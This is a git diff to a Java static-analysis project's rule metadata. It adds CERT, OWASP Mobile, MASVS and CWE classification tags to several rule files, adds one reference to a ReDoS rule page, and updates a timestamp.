diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.json
index 3e82db14459..6f65651a9ce 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.json
@@ -9,10 +9,10 @@
"tags": [
"cwe",
"privacy",
- "cert",
"owasp-a6",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5547",
@@ -26,6 +26,15 @@
"OWASP": [
"A3",
"A6"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-3"
+ ],
+ "CERT": [
+ "MSC61-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5738_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5738_java.json
index 1f2b0a63f02..03b7538e4e0 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5738_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5738_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
477
+ ],
+ "CERT": [
+ "MET02-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.html
index b24d62616c4..818e62571f2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.html
@@ -104,6 +104,7 @@ See
- OWASP Top 10 2017 Category A1 - Injection
- MITRE, CWE-400 - Uncontrolled Resource Consumption
+ - MITRE, CWE-1333 - Inefficient Regular Expression Complexity
- owasp.org - OWASP Regular expression Denial
of Service - ReDoS
- stackstatus.net - Outage Postmortem - July 20, 2016
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.json
index 8ad0e55721b..b97498d145c 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.json
@@ -17,7 +17,8 @@
"scope": "All",
"securityStandards": {
"CWE": [
- 400
+ 400,
+ 1333
],
"OWASP": [
"A1"
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S818_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S818_java.json
index 625d91a9daf..dd8314782f9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S818_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S818_java.json
@@ -14,5 +14,11 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-818",
"sqKey": "S818",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL16-C.",
+ "DCL50-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S864_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S864_java.json
index 89c345ccc5d..db70d52caed 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S864_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S864_java.json
@@ -17,6 +17,11 @@
"securityStandards": {
"CWE": [
783
+ ],
+ "CERT": [
+ "EXP00-C.",
+ "EXP00-CPP.",
+ "EXP53-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S881_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S881_java.json
index b1c964c14ae..86c398601b9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S881_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S881_java.json
@@ -12,5 +12,12 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-881",
"sqKey": "S881",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "EXP30-C.",
+ "EXP50-CPP.",
+ "EXP05-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S888_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S888_java.json
index b74499033c3..9114b5bcbe9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S888_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S888_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
835
+ ],
+ "CERT": [
+ "MSC21-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S899_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S899_java.json
index 4feb7e8ef11..f4ceff6fd96 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S899_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S899_java.json
@@ -18,6 +18,13 @@
"securityStandards": {
"CWE": [
754
+ ],
+ "CERT": [
+ "EXP00-J.",
+ "EXP12-C.",
+ "FIO02-J.",
+ "ERR33-C.",
+ "POS54-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S923_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S923_java.json
index b879f69bbe7..aa6c4b7e0a3 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S923_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S923_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Info",
"ruleSpecification": "RSPEC-923",
"sqKey": "S923",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL50-CPP."
+ ]
+ }
}
diff --git a/sonarpedia.json b/sonarpedia.json
index 82abed61a84..86a8d86ca87 100644
--- a/sonarpedia.json
+++ b/sonarpedia.json
@@ -3,7 +3,7 @@
"languages": [
"JAVA"
],
- "latest-update": "2021-06-07T12:45:20.306737833Z",
+ "latest-update": "2021-06-25T11:15:59.148768Z",
"options": {
"no-language-in-filenames": false,
"preserve-filenames": false